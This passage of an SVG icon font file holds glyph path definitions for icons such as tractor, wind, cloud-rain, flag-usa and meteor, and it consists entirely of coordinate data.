d="M151.17 280.65l-27.1504 54.2998c-1.86035 3.72949 -3.37109 10.1387 -3.37109 14.3066c0 2.86719 0.735352 7.40234 1.6416 10.123l25.8896 77.6797c2.79004 8.39062 11.8604 12.9209 20.2402 10.1201l15.1699 -5.05957
c8.39062 -2.7998 12.9102 -11.8604 10.1201 -20.2402l-23.7998 -71.3896l20.29 -40.5801c-1.41016 -4.20996 -2.49023 -8.20996 -3.20996 -11.79l-5.2207 -26.1201h-4.66992zM573.31 98.6201c4.90039 -7.35059 2.9209 -17.2803 -4.43945 -22.1797l-13.3105 -8.88086
c-7.34961 -4.89941 -17.29 -2.90918 -22.1895 4.44043l-48 72h-47.0605l60.8301 -97.3301c3.16992 -5.08008 4.86035 -10.96 4.86035 -16.96v-77.71c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v73.1104l-74.0801 118.529
c1 -14.0498 2.08008 -28.1094 2.08008 -42.21c0 -53.0693 -40.7598 -101.43 -96 -101.43s-96 48.3604 -96 101.43c0 14.1006 1.07031 28.1602 2.08008 42.21l-74.0801 -118.529v-73.1104c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v77.7002
v0.00976562c0 5.0625 2.17773 12.6562 4.86035 16.9502l60.8301 97.3301h-47.0605l-48 -72c-4.89941 -7.35059 -14.8398 -9.33984 -22.1895 -4.44043l-13.3105 8.87988c-7.36035 4.90039 -9.33984 14.8398 -4.43945 22.1904l52.7393 79.1299
c5.24707 7.86426 17.1768 14.248 26.6299 14.25h77.9404l-68.9902 24.3496c-5.75 1.91895 -13.1465 7.56738 -16.5098 12.6104l-53.5996 80.4102c-4.90039 7.36035 -2.91016 17.29 4.43945 22.1895l13.3105 8.88086c7.35938 4.89941 17.29 2.90918 22.1895 -4.44043
l50.5703 -75.8301l60.4902 -20.1699h36.0996l10.3701 51.8496c2.18945 10.9707 17.3701 60.1504 69.6299 60.1504s67.4404 -49.1797 69.6299 -60.1504l10.3701 -51.8496h36.0996l60.5 20.1699l50.5605 75.8301c4.89941 7.34961 14.8398 9.33984 22.1895 4.44043
l13.3105 -8.88086c7.34961 -4.89941 9.33984 -14.8398 4.43945 -22.1895l-53.5996 -80.4102c-3.36328 -5.04297 -10.7598 -10.6914 -16.5098 -12.6104l-68.9902 -24.3594h77.9404c9.45117 -0.00195312 21.377 -6.38672 26.6191 -14.25zM406.09 350.49l-23.7998 71.3896
c-2.79004 8.37988 1.74023 17.4404 10.1201 20.2402l15.1699 5.05957c8.37988 2.80078 17.4502 -1.73926 20.2402 -10.1201l25.8896 -77.6797c0.908203 -2.72168 1.64551 -7.25781 1.64551 -10.127c0 -4.16699 -1.5127 -10.5752 -3.375 -14.3027l-27.1504 -54.2998
l-25.9297 -8.65039h-4.66992l-5.2207 26.1201c-0.719727 3.58008 -1.7998 7.58008 -3.20996 11.79z" />
    <glyph glyph-name="toilet-paper" unicode="&#xf71e;" horiz-adv-x="576" 
d="M128 448h284.44c-36.7705 -38.4805 -60.4404 -108.4 -60.4404 -192v-172.07c0 -53.6494 -11.8799 -87.5693 -24.71 -126.05c-4.36035 -13.0703 -16.5898 -21.8799 -30.3604 -21.8799h-280.92c-10.9199 0 -18.6299 10.7002 -15.1797 21.0596
c21.3701 64.1006 31.1699 85.75 31.1699 126.87v172.07c0 106.04 42.9805 192 96 192zM96 224c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16zM160 224c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16
s7.16016 -16 16 -16zM224 224c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16zM288 224c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16zM480 448c53.0195 0 96 -85.96 96 -192
s-42.9805 -192 -96 -192s-96 85.96 -96 192s42.9805 192 96 192zM480 192c17.6699 0 32 28.6504 32 64s-14.3301 64 -32 64s-32 -28.6504 -32 -64s14.3301 -64 32 -64z" />
    <glyph glyph-name="tractor" unicode="&#xf722;" horiz-adv-x="639" 
d="M528 112c48.5996 0 88 -39.4004 88 -88s-39.4004 -88 -88 -88s-88 39.4004 -88 88s39.4004 88 88 88zM528 0c13.2305 0 24 10.7695 24 24s-10.7695 24 -24 24s-24 -10.7695 -24 -24s10.7695 -24 24 -24zM608 288c17.6699 0 32 -14.3301 31.9902 -32v-50.7598
c0 -8.49023 -3.37012 -16.6299 -9.37012 -22.6299l-50.8203 -50.8203c-15.7295 7.58984 -33.1602 12.2002 -51.7998 12.2002c-39.1396 0 -73.5498 -19.0098 -95.46 -48h-80.54v-6c0 -12.1504 -9.84961 -22 -22 -22h-7.16016
c-2.9502 -9.90039 -6.91992 -19.46 -11.9102 -28.7207l5.06055 -5.05957c8.58984 -8.58984 8.58984 -22.5195 0 -31.1104l-31.1104 -31.1094c-8.58984 -8.58984 -22.5195 -8.58984 -31.1104 0l-5.05957 5.05957c-9.25977 -4.99023 -18.8203 -8.95996 -28.7197 -11.9102
v-7.13965c0 -12.1504 -9.85059 -22 -22 -22h-44c-12.1504 0 -22 9.84961 -22 22v7.15039c-9.90039 2.94922 -19.46 6.91992 -28.7207 11.9092l-5.05957 -5.05957c-8.58984 -8.58984 -22.5195 -8.58984 -31.1104 0l-31.1094 31.1104
c-8.58984 8.58984 -8.58984 22.5195 0 31.1094l5.05957 5.06055c-4.99023 9.26953 -8.9502 18.8193 -11.9102 28.7295h-7.13965c-12.1504 0 -22 9.85059 -22 22v44c0 12.1504 9.84961 22 22 22h7.15039c2.94922 9.90039 6.91992 19.46 11.9092 28.7207l-5.05957 5.05957
c-8.58984 8.58984 -8.58984 22.5195 0 31.1104l31.1104 31.1094c7.92969 7.93066 20.2598 8.2002 28.8896 1.4707v146.52c0 26.4697 21.5303 48 48 48h133.45h0.046875c17.4834 0 37.2324 -13.0547 44.083 -29.1396l56.0898 -130.86h102.33v40.2002
c0 29.9902 10.5801 58.8994 29.5 81.7197c6.37988 7.7002 18.04 8.23047 24.7002 0.780273l21.6299 -24.1699c4.87012 -5.43066 5.74023 -13.6904 1.32031 -19.4902c-8.4502 -11.0801 -13.1504 -24.7197 -13.1504 -38.8398v-40.2002h64zM176 32c44.1797 0 80 35.8203 80 80
s-35.8203 80 -80 80s-80 -35.8203 -80 -80s35.8203 -80 80 -80zM198 288h110.04l-41.1504 96h-106.89v-96h38z" />
    <glyph glyph-name="user-injured" unicode="&#xf728;" horiz-adv-x="448" 
d="M277.37 436.02l-90.6904 -68.0195h-81.1895c19.0098 46.8701 64.8193 80 118.51 80c19.1104 0 37.0801 -4.46973 53.3701 -11.9805zM342.51 368h-102.52l66.0293 49.5195c15.8203 -13.3193 28.5908 -30.0498 36.4902 -49.5195zM224 192c-70.6904 0 -128 57.3096 -128 128
c0 5.48047 0.94043 10.7002 1.61035 16h252.779c0.660156 -5.2998 1.61035 -10.5195 1.61035 -16c0 -70.6904 -57.3096 -128 -128 -128zM80 148.3c7.92676 3.51758 21.2812 7.64844 29.8096 9.21973l98.4502 -221.52h-128.26v212.3zM0 -16v41.5996
c0 41.1406 18.8799 77.5107 48 102.16v-191.76c-26.5098 0 -48 21.4902 -48 48zM256 32c26.4697 0 48 -21.5303 48 -48s-21.5303 -48 -48 -48h-12.71l-42.6699 96h55.3799zM313.6 160c74.2305 0 134.4 -60.1699 134.4 -134.4v-41.5996c0 -26.5098 -21.4902 -48 -48 -48
h-80.4102c10.1504 13.4102 16.4102 29.9199 16.4102 48c0 44.1104 -35.8896 80 -80 80h-69.5898l-42.6699 96h7.37012c22.2393 -10.1797 46.8799 -16 72.8896 -16s50.6504 5.82031 72.8896 16h16.71z" />
    <glyph glyph-name="vr-cardboard" unicode="&#xf729;" horiz-adv-x="640" 
d="M608 384c17.6699 0 32 -14.3301 32 -32v-320c0 -17.6699 -14.3301 -32 -32 -32h-160.22c-25.1807 0 -48.0303 14.7695 -58.3604 37.7402l-27.7402 61.6396c-7.88965 17.54 -24.0293 28.6201 -41.6797 28.6201s-33.79 -11.0801 -41.6797 -28.6201l-27.7402 -61.6396
c-10.3301 -22.9707 -33.1699 -37.7402 -58.3604 -37.7402h-160.22c-17.6699 0 -32 14.3301 -32 32v320c0 17.6699 14.3301 32 32 32h576zM160 144c35.3496 0 64 28.6504 64 64s-28.6504 64 -64 64s-64 -28.6504 -64 -64s28.6504 -64 64 -64zM480 144
c35.3496 0 64 28.6504 64 64s-28.6504 64 -64 64s-64 -28.6504 -64 -64s28.6504 -64 64 -64z" />
    <glyph glyph-name="wind" unicode="&#xf72e;" 
d="M156.7 192c48.7002 0 92.2998 -35 98.3994 -83.4004c7.5 -58.5 -38.0996 -108.6 -95.1992 -108.6c-46.6006 0 -85.6006 33.5 -94.2002 77.5996c-1.7998 9.60059 6.09961 18.4004 15.8994 18.4004h32.8008c6.59961 0 13.0996 -3.7998 15.1992 -10.0996
c4.30078 -12.7002 16.3008 -21.9004 30.4004 -21.9004c19.5 0 34.9004 17.4004 31.5996 37.4004c-2.59961 15.6992 -17.5 26.5996 -33.3994 26.5996h-142.2c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h140.7zM16 224c-8.7998 0 -16 7.2002 -16 16v32
c0 8.7998 7.2002 16 16 16h334.2c16 0 30.7998 10.9004 33.3994 26.5996c3.30078 20 -12.1992 37.4004 -31.5996 37.4004c-14.0996 0 -26.0996 -9.2002 -30.4004 -21.9004c-2.09961 -6.2998 -8.5 -10.0996 -15.1992 -10.0996h-32.8008
c-9.69922 0 -17.6992 8.7002 -15.7998 18.2998c9.7998 50.6006 59.5 87.1006 114.9 75.5c36.2002 -7.59961 65.5 -36.8994 73.0996 -73.0996c13 -61.9004 -34.0996 -116.7 -93.7998 -116.7h-336zM400 192c70.5 0 126 -65.5 108.9 -138.7
c-9.60059 -41.0996 -43.5 -74 -84.7002 -82.7002c-58.9004 -12.5 -111.601 21.7002 -129.4 72.3008c-3.7002 10.2998 4.40039 21.0996 15.2998 21.0996h33.8008c5.7998 0 11.5996 -2.59961 14.5 -7.59961c8.2998 -14.5 23.6992 -24.4004 41.5996 -24.4004
c26.5 0 48 21.5 48 48s-21.5 48 -48 48h-116.5c-6.59961 25.2002 -20.5 47.4004 -39.7998 64h156.3z" />
    <glyph glyph-name="wine-bottle" unicode="&#xf72f;" 
d="M507.31 375.43c6.25 -6.25 6.25 -16.3799 0.0107422 -22.6201l-22.6299 -22.6299c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-76.6699 -76.6699c19.7002 -46.5801 10.7305 -102.41 -27.2295 -140.37l-158.391 -158.39c-24.9893 -24.9902 -65.5195 -24.9902 -90.5098 0
l-90.5098 90.5098c-24.9902 24.9902 -24.9902 65.5205 0 90.5098l158.38 158.381c37.9697 37.96 93.79 46.9297 140.37 27.2295l76.6699 76.6699c-6.25 6.25 -6.25 16.3799 0 22.6299l22.6299 22.6299c6.25 6.25 16.3799 6.25 22.6299 0zM179.22 24.71l122.04 122.04
l-90.5098 90.5098l-122.04 -122.04z" />
    <glyph glyph-name="cloud-meatball" unicode="&#xf73b;" 
d="M48 96c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48s21.5 48 48 48zM464 96c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48s21.5 48 48 48zM345 84.9004c13.5 -7 23 -20.7002 23 -36.9004s-9.5 -29.9004 -23 -36.9004
c4.59961 -14.5 1.7002 -30.7998 -9.7998 -42.2998c-8.2002 -8.2002 -18.9004 -12.2998 -29.7002 -12.2998c-4.2998 0 -8.5 1.2002 -12.5996 2.5c-7 -13.5 -20.7002 -23 -36.9004 -23s-29.9004 9.5 -36.9004 23c-4.09961 -1.40039 -8.2998 -2.5 -12.5996 -2.5
c-10.7998 0 -21.5 4.09961 -29.7002 12.2998c-11.5 11.5 -14.5 27.7998 -9.89941 42.2998c-13.5 7 -23 20.7002 -23 36.9004s9.5 29.9004 23 36.9004c-4.5 14.5 -1.60059 30.7998 9.89941 42.2998s27.7998 14.5 42.2998 9.89941c7 13.5 20.7002 23 36.9004 23
s29.9004 -9.5 36.9004 -23c14.5 4.5 30.7998 1.60059 42.2998 -9.89941c11.3994 -11.5 14.3994 -27.7998 9.7998 -42.2998zM512 224c0 -53 -43 -96 -96 -96h-43.4004c-3.5 8 -8.39941 15.4004 -14.7998 21.7998c-13.5 13.5 -31.5 21.1006 -50.7998 21.2998
c-13.5 13.2002 -31.7002 20.9004 -51 20.9004s-37.5 -7.7002 -51 -20.9004c-19.2998 -0.199219 -37.2998 -7.7998 -50.7998 -21.2998c-6.40039 -6.39941 -11.2002 -13.7998 -14.7998 -21.7998h-43.4004c-53 0 -96 43 -96 96c0 42.5 27.7998 78.2002 66.0996 90.7998
c-1.2998 6.90039 -2.09961 13.9004 -2.09961 21.2002c0 61.9004 50.0996 112 112 112c43.2998 0 80.4004 -24.7998 99 -60.7998c14.7002 17.5 36.4004 28.7998 61 28.7998c44.2002 0 80 -35.7998 80 -80c0 -5.59961 -0.5 -11 -1.59961 -16.2002
c0.5 0 1 0.200195 1.59961 0.200195c53 0 96 -43 96 -96z" />
    <glyph glyph-name="cloud-moon-rain" unicode="&#xf73c;" horiz-adv-x="575" 
d="M350.5 222.5c37.2998 -6.7998 65.5 -39.2998 65.5 -78.5c0 -44.2002 -35.7998 -80 -80 -80h-256c-44.2002 0 -80 35.7998 -80 80c0 38.7998 27.5996 71.0996 64.2002 78.4004c0 0.5 -0.200195 1.09961 -0.200195 1.59961c0 53 43 96 96 96
c32.0996 0 60.2998 -15.9004 77.7002 -40c10.3994 5 22 8 34.2998 8c39.2002 0 71.5996 -28.2998 78.5 -65.5zM567.9 224.2c6.19922 1.2002 10.5996 -6 6.39941 -10.7998c-27 -33.1006 -67.8994 -53.3008 -112.6 -53.3008c-5.2002 0 -10.1006 1 -15.2002 1.5
c-6.2002 39.4004 -33.0996 72.5 -70.2002 86.8008c-10.7002 27.8994 -32.2002 49.7998 -58.8994 61.6992c3.2998 76.7002 66.5 137.9 144.399 137.9c8.90039 0 17.7998 -0.799805 26.5 -2.40039c6.2002 -1.09961 7.60059 -9.39941 2.10059 -12.5
c-35.6006 -20.0996 -57.5 -57.5 -57.5 -98.0996c0 -70.5 64.5996 -124.1 135 -110.8zM364.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961
c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM268.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961
c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM172.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64
c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM76.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008
l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6z" />
    <glyph glyph-name="cloud-rain" unicode="&#xf73d;" 
d="M416 320c53 0 96 -43 96 -96s-43 -96 -96 -96h-320c-53 0 -96 43 -96 96c0 42.5 27.7998 78.2002 66.0996 90.7998c-1.2998 6.90039 -2.09961 13.9004 -2.09961 21.2002c0 61.9004 50.0996 112 112 112c43.2998 0 80.4004 -24.7998 99 -60.7998
c14.7002 17.5 36.4004 28.7998 61 28.7998c44.2002 0 80 -35.7998 80 -80c0 -5.59961 -0.5 -11 -1.59961 -16.2002c0.5 0 1 0.200195 1.59961 0.200195zM88 73.7998c2.5 8.5 13.7998 8.10059 16 0c12.7998 -44.5996 40 -56.2998 40 -87.7002
c0 -27.6992 -21.5 -50.0996 -48 -50.0996s-48 22.4004 -48 50.0996c0 31.3008 27.2002 43.3008 40 87.7002zM248 73.7998c2.5 8.5 13.7998 8.10059 16 0c12.7998 -44.5996 40 -56.2998 40 -87.7002c0 -27.6992 -21.5 -50.0996 -48 -50.0996s-48 22.4004 -48 50.0996
c0 31.3008 27.2002 43.3008 40 87.7002zM408 73.7998c2.5 8.5 13.7998 8.10059 16 0c12.7998 -44.5996 40 -56.2998 40 -87.7002c0 -27.6992 -21.5 -50.0996 -48 -50.0996s-48 22.4004 -48 50.0996c0 31.3008 27.2002 43.3008 40 87.7002z" />
    <glyph glyph-name="cloud-showers-heavy" unicode="&#xf740;" 
d="M183.9 77.9004c7.69922 -4.40039 10.3994 -14.2002 6 -21.8008l-64 -112c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.30078 -10.3994 14.1006 -6 21.8008l64 112
c4.40039 7.7998 14.2002 10.3994 21.8008 6zM279.9 77.9004c7.69922 -4.40039 10.3994 -14.2002 6 -21.8008l-64 -112c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.30078 -10.3994 14.1006 -6 21.8008
l64 112c4.40039 7.7998 14.2002 10.3994 21.8008 6zM87.9004 77.9004c7.69922 -4.40039 10.3994 -14.2002 6 -21.8008l-64 -112c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961
c-7.69922 4.30078 -10.3994 14.1006 -6 21.8008l64 112c4.40039 7.7998 14.2002 10.3994 21.8008 6zM471.9 77.9004c7.69922 -4.40039 10.3994 -14.2002 6 -21.8008l-64 -112c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961
c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.30078 -10.3994 14.1006 -6 21.8008l64 112c4.40039 7.7998 14.2002 10.3994 21.8008 6zM375.9 77.9004c7.69922 -4.40039 10.3994 -14.2002 6 -21.8008l-64 -112
c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.30078 -10.3994 14.1006 -6 21.8008l64 112c4.40039 7.7998 14.2002 10.3994 21.8008 6zM416 320c53 0 96 -43 96 -96s-43 -96 -96 -96h-320
c-53 0 -96 43 -96 96c0 42.5 27.7998 78.2002 66.0996 90.7998c-1.2998 6.90039 -2.09961 13.9004 -2.09961 21.2002c0 61.9004 50.2002 112 112 112c43.2998 0 80.4004 -24.7998 99 -60.7998c14.7002 17.5 36.4004 28.7998 61 28.7998c44.2002 0 80 -35.7998 80 -80
c0 -5.59961 -0.5 -11 -1.59961 -16.2002c0.5 0 1 0.200195 1.59961 0.200195z" />
    <glyph glyph-name="cloud-sun-rain" unicode="&#xf743;" horiz-adv-x="576" 
d="M510.5 222.5c37.2998 -6.7998 65.5 -39.2998 65.5 -78.5c0 -44.2002 -35.7998 -80 -80 -80h-256c-44.2002 0 -80 35.7998 -80 80c0 38.7998 27.5996 71 64.2002 78.4004c0 0.5 -0.200195 1.09961 -0.200195 1.59961c0 53 43 96 96 96
c32.0996 0 60.2998 -15.9004 77.7002 -40c10.3994 5 22 8 34.2998 8c39.2002 0 71.5996 -28.2998 78.5 -65.5zM124.1 188.1c3.10059 -3.09961 6.60059 -5.59961 10.2002 -8.2998c-3.89941 -11.3994 -6.2002 -23.3994 -6.2002 -35.8994c0 -2.5 0.5 -4.80078 0.700195 -7.2002
l-59.2002 -19.7002c-10.1992 -3.2998 -19.8994 6.2998 -16.5 16.5l25.1006 75.2998l-71 35.5c-9.60059 4.7998 -9.60059 18.5 0 23.2998l71 35.5l-25.1006 75.3008c-3.39941 10.1992 6.2002 19.8994 16.4004 16.5l75.2998 -25.1006l35.5 71
c4.7998 9.60059 18.5 9.60059 23.2998 0l35.5 -71l75.3008 25.1006c10.1992 3.39941 19.8994 -6.2002 16.5 -16.4004l-8.90039 -26.7002c-0.700195 0 -1.2998 0.200195 -2 0.200195c-25.5996 0 -49.2002 -7.7998 -69.2002 -20.7002
c-37.5996 29.4004 -92.0996 27.2002 -126.7 -7.39941c-37.3994 -37.5 -37.3994 -98.4004 0 -135.801zM193.9 246.1c-18.2002 -8.2998 -33.5 -21.2998 -44.8008 -37.1992c-12.8994 11.6992 -21.0996 28.3994 -21.0996 47.0996c0 35.2998 28.7002 64 64 64
c12.4004 0 24 -3.7002 33.7998 -9.90039c-16.0996 -17.5996 -27.5996 -39.5 -31.8994 -64zM524.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961
c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM428.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961
c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM332.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008l-36.5996 -64
c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6zM236.5 29.9004c7.7002 -4.40039 10.2998 -14.1006 6 -21.8008
l-36.5996 -64c-3 -5.19922 -8.40039 -8.09961 -13.9004 -8.09961c-2.7002 0 -5.40039 0.700195 -7.90039 2.09961c-7.69922 4.40039 -10.3994 14.1006 -6 21.8008l36.6006 64c4.39941 7.7998 14.2002 10.2998 21.7998 6z" />
    <glyph glyph-name="democrat" unicode="&#xf747;" horiz-adv-x="639" 
d="M637.3 191.1c4.90039 -7.39941 2.90039 -17.2998 -4.39941 -22.2998l-26.6006 -17.7002c-7.39941 -4.89941 -17.2998 -3 -22.2002 4.40039c-21.7998 32.7002 -23.8994 38.0996 -40.0996 50.2998v-77.7998h-352l-54 108l-38.0996 -34.5996
c-6 -6 -14.1006 -9.40039 -22.6006 -9.40039h-31c-12.0996 0 -23.2002 6.90039 -28.5996 17.7002l-14.2998 28.5996c-5.40039 10.7998 -4.30078 23.7998 3 33.5l74.5996 99.2998c1.7002 2.30078 4.2002 3.7002 6.40039 5.40039c-4 2.2002 -8 4.2002 -11.3008 7.5
c-16.3994 16.4004 -18.3994 41.7998 -6.09961 60.4004c2.7998 4.19922 8.7998 4.7998 12.4004 1.19922l42.8994 -42.7998l41.7998 41.7998c4.40039 4.40039 11.8008 3.7002 15.2002 -1.5c15.1006 -22.7998 12.6006 -53.7998 -7.5 -73.8994l81.2002 -81.2002h235.6
c50.8008 0 97.9004 -25.2002 126.101 -67.5zM296.2 204.7c3 2.89941 1.39941 7.89941 -2.60059 8.5l-22.7998 3.2998l-10.2002 20.7002c-1.89941 3.7002 -7.19922 3.7002 -9 0l-10.1992 -20.7002l-22.8008 -3.2998c-4.09961 -0.600586 -5.7998 -5.60059 -2.7998 -8.5
l16.5 -16.1006l-3.89941 -22.6992c-0.700195 -4.10059 3.59961 -7.2002 7.19922 -5.30078l20.4004 10.7002l20.4004 -10.7002c3.59961 -1.89941 7.89941 1.2002 7.19922 5.30078l-3.89941 22.6992zM408.2 204.7c3 2.89941 1.39941 7.89941 -2.60059 8.5l-22.7998 3.2998
l-10.2002 20.7002c-1.89941 3.7002 -7.19922 3.7002 -9 0l-10.1992 -20.7002l-22.8008 -3.2998c-4.09961 -0.600586 -5.7998 -5.60059 -2.7998 -8.5l16.5 -16.1006l-3.89941 -22.6992c-0.700195 -4.10059 3.59961 -7.2002 7.19922 -5.30078l20.4004 10.7002
l20.4004 -10.7002c3.59961 -1.89941 7.89941 1.2002 7.19922 5.30078l-3.89941 22.6992zM520.2 204.7c3 2.89941 1.39941 7.89941 -2.60059 8.5l-22.7998 3.2998l-10.2002 20.7002c-1.89941 3.7002 -7.19922 3.7002 -9 0l-10.1992 -20.7002l-22.8008 -3.2998
c-4.09961 -0.600586 -5.7998 -5.60059 -2.7998 -8.5l16.5 -16.1006l-3.89941 -22.6992c-0.700195 -4.10059 3.59961 -7.2002 7.19922 -5.30078l20.4004 10.7002l20.4004 -10.7002c3.59961 -1.89941 7.89941 1.2002 7.19922 5.30078l-3.89941 22.6992zM192 -48v144h352v-144
c0 -8.7998 -7.2002 -16 -16 -16h-64c-8.7998 0 -16 7.2002 -16 16v80h-160v-80c0 -8.7998 -7.2002 -16 -16 -16h-64c-8.7998 0 -16 7.2002 -16 16z" />
    <glyph glyph-name="flag-usa" unicode="&#xf74d;" 
d="M32 448c17.7002 0 32 -14.2998 32 -32v-464c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v464c0 17.7002 14.2998 32 32 32zM299.9 144.4c31.0996 -8.2002 62.5996 -16.5 100 -16.6006c31.8994 0 68.5 6.7998 112.1 24.1006v-36
c0 -12.3008 -7.09961 -23.8008 -18.5 -28.8008c-175.8 -76.3994 -211.8 69.1006 -397.5 -23.0996v69.2998c92.2002 39.9004 146.7 26.2002 203.9 11.1006zM299.9 240.4c31.0996 -8.2002 62.5996 -16.5 100 -16.5c31.8994 0 68.5 6.7998 112.1 24.0996v-61.5
c-92.2002 -39.9004 -146.7 -26.2002 -203.9 -11.0996c-57.5 15.0996 -117.3 30 -212.1 -7.60059v61.5c92.2002 39.9004 146.7 26.2002 203.9 11.1006zM309.4 366.3c-7 2.10059 -14.1006 4.2002 -21.3008 6.2002v-33.2002c4 -1.09961 8.10059 -2.2998 12.1006 -3.5
c26.7002 -8.09961 52.8994 -15.8994 85.7002 -15.8994c32.7998 0 72.5 7.89941 126.1 31.3994v-68.8994c-92.2002 -39.8008 -146.7 -26.1006 -203.9 -11.1006c-57.5 15.1006 -117.3 29.9004 -212.1 -7.59961v151.899c209.4 94.6006 195.3 -59.0996 366.6 28.2002
c22.6006 11.5 49.4004 -1.5 49.4004 -26.5996v-30.7998c-105.2 -49.1006 -150.8 -35.7002 -202.6 -20.1006zM160 319.9c8.7998 0 16 7.09961 16 16c0 8.89941 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.90039 7.2002 -16 16 -16zM160 375.7c8.7998 0 16 7.2002 16 16
c0 8.89941 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.90039 7.2002 -16 16 -16zM224 327.8c8.7998 0 16 7.2002 16 16c0 8.90039 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.89941 7.2002 -16 16 -16zM224 383.7c8.7998 0 16 7.2002 16 16c0 8.89941 -7.2002 16 -16 16
s-16 -7.2002 -16 -16c0 -8.90039 7.2002 -16 16 -16z" />
    <glyph glyph-name="meteor" unicode="&#xf753;" 
d="M491.2 447.3c12.3994 3.7002 23.7998 -7.7002 20.2002 -20.0996c-11.6006 -38.7002 -34.3008 -111.7 -61.3008 -187.7c7 -2.09961 13.4004 -4 18.6006 -5.59961c9.7002 -3 14.2002 -13.9004 9.5 -22.9004c-22.1006 -42.2998 -82.7002 -152.8 -142.5 -214.4
c-1 -1.09961 -2 -2.5 -3 -3.5c-38.1006 -38.0996 -88 -57.0996 -137.9 -57.0996c-49.8994 -0.0996094 -99.7998 19 -137.8 57c-38 38.0996 -57 88 -57 137.8c0 49.9004 19 99.7998 57.0996 137.8c1 1 2.40039 2 3.5 3c61.6006 59.9004 172 120.4 214.4 142.5
c9 4.7002 19.9004 0.200195 22.9004 -9.5c1.59961 -5.09961 3.5 -11.5996 5.59961 -18.5996c75.9004 27 149 49.7002 187.7 61.2998zM192 0c70.7002 0 128 57.2998 128 128s-57.2998 128 -128 128s-128 -57.2998 -128 -128s57.2998 -128 128 -128zM160 192
c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM208 96c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16s-16 7.2002 -16 16s7.2002 16 16 16z" />
    <glyph glyph-name="person-booth" unicode="&#xf756;" horiz-adv-x="576" 
d="M192 -48v176h64v-176c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16zM224 224c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32h-57.5c-12.7998 0 -24.7998 5 -33.9004 14.0996l-20.8994 20.9004v-80.5996l41.2002 -61.3008
c4.39941 -8.7998 6.69922 -18.6992 6.69922 -28.5996v-56.5c0 -17.7002 -14.2998 -32 -32 -32c-17.6992 0 -32 14.2998 -32 32v56l-29.0996 43c-0.900391 0.400391 -1.59961 1.2002 -2.5 1.7002l-0.0996094 -100.7c0 -17.7002 -14.4004 -32 -32 -32
